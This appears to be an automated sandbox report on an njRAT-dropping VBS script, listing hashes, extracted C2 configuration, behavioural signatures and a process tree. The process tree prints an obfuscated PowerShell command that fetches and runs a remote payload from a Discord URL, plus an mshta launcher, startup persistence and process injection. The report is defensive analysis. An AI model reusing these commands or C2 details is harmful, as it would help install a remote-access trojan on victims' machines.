Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en -
submitted
15-09-2021 08:29
Static task
static1
Behavioral task
behavioral1
Sample
e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
Resource
win7v20210408
General
-
Target
e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
-
Size
828B
-
MD5
9af0d5fbc14e3ac0ae409dfef6e04228
-
SHA1
931b3139830e5485f198bb72ecba50475e4c8df2
-
SHA256
e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed
-
SHA512
fdca50df12edb4d7784a3c769908a695221456e8729b7ec61ec86b8328a18040c5aca7f2d6879f336b6c1a44b1323a8f1f05ff6dd14a4cbd9f233fedcd019f0e
Malware Config
Extracted
njrat
0.7NC
NYAN CAT
envirat.duckdns.org:3013
6de17d5355fa43eca7e
-
reg_key
6de17d5355fa43eca7e
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 524 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3924 set thread context of 2828 3924 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 524 powershell.exe 524 powershell.exe 524 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
Processes:
powershell.exepowershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 524 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe Token: 33 2828 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2828 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exeWScript.execmd.exemshta.exepowershell.exedescription pid process target process PID 4000 wrote to memory of 524 4000 WScript.exe powershell.exe PID 4000 wrote to memory of 524 4000 WScript.exe powershell.exe PID 524 wrote to memory of 1956 524 powershell.exe WScript.exe PID 524 wrote to memory of 1956 524 powershell.exe WScript.exe PID 1956 wrote to memory of 4076 1956 WScript.exe cmd.exe PID 1956 wrote to memory of 4076 1956 WScript.exe cmd.exe PID 4076 wrote to memory of 2832 4076 cmd.exe mshta.exe PID 4076 wrote to memory of 2832 4076 cmd.exe mshta.exe PID 2832 wrote to memory of 3924 2832 mshta.exe powershell.exe PID 2832 wrote to memory of 3924 2832 mshta.exe powershell.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe PID 3924 wrote to memory of 2828 3924 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results2⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBSMD5
558a8b7b3fdef4ca79110f8cfd126694
SHA1d6e96ca27f701b3f4c24885dacd14c762a9d36b0
SHA25638c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
SHA51237d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283
-
C:\Users\Admin\AppData\Roaming\SystemLogin.batMD5
7f85382953fde20b101039d48673dbd2
SHA15ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
SHA256fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
SHA5126e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46
-
C:\Users\Public\myScript.ps1MD5
317f5c7ef5b887966f963c21a60e2889
SHA15078bdb3e7376202c7253a8b428a360e1c047863
SHA256cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd
SHA512e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750
-
memory/524-121-0x000001ED28FA0000-0x000001ED28FA1000-memory.dmpFilesize
4KB
-
memory/524-124-0x000001ED28600000-0x000001ED28602000-memory.dmpFilesize
8KB
-
memory/524-126-0x000001ED28603000-0x000001ED28605000-memory.dmpFilesize
8KB
-
memory/524-142-0x000001ED29250000-0x000001ED29251000-memory.dmpFilesize
4KB
-
memory/524-153-0x000001ED29310000-0x000001ED29311000-memory.dmpFilesize
4KB
-
memory/524-159-0x000001ED28606000-0x000001ED28608000-memory.dmpFilesize
8KB
-
memory/524-160-0x000001ED29220000-0x000001ED29222000-memory.dmpFilesize
8KB
-
memory/524-115-0x0000000000000000-mapping.dmp
-
memory/1956-177-0x0000000000000000-mapping.dmp
-
memory/2828-211-0x000000000040677E-mapping.dmp
-
memory/2828-210-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/2828-221-0x00000000054C0000-0x00000000054C1000-memory.dmpFilesize
4KB
-
memory/2828-220-0x0000000005230000-0x0000000005231000-memory.dmpFilesize
4KB
-
memory/2828-219-0x0000000005150000-0x000000000564E000-memory.dmpFilesize
5.0MB
-
memory/2828-218-0x00000000052A0000-0x00000000052A1000-memory.dmpFilesize
4KB
-
memory/2828-217-0x0000000005650000-0x0000000005651000-memory.dmpFilesize
4KB
-
memory/2828-216-0x00000000050B0000-0x00000000050B1000-memory.dmpFilesize
4KB
-
memory/2832-181-0x0000000000000000-mapping.dmp
-
memory/3924-202-0x000001F74B5B0000-0x000001F74B5B2000-memory.dmpFilesize
8KB
-
memory/3924-209-0x000001F74B5D0000-0x000001F74B5D3000-memory.dmpFilesize
12KB
-
memory/3924-208-0x000001F730CC6000-0x000001F730CC8000-memory.dmpFilesize
8KB
-
memory/3924-207-0x000001F74B5C0000-0x000001F74B5C5000-memory.dmpFilesize
20KB
-
memory/3924-184-0x0000000000000000-mapping.dmp
-
memory/3924-194-0x000001F730CC0000-0x000001F730CC2000-memory.dmpFilesize
8KB
-
memory/3924-195-0x000001F730CC3000-0x000001F730CC5000-memory.dmpFilesize
8KB
-
memory/4076-180-0x0000000000000000-mapping.dmp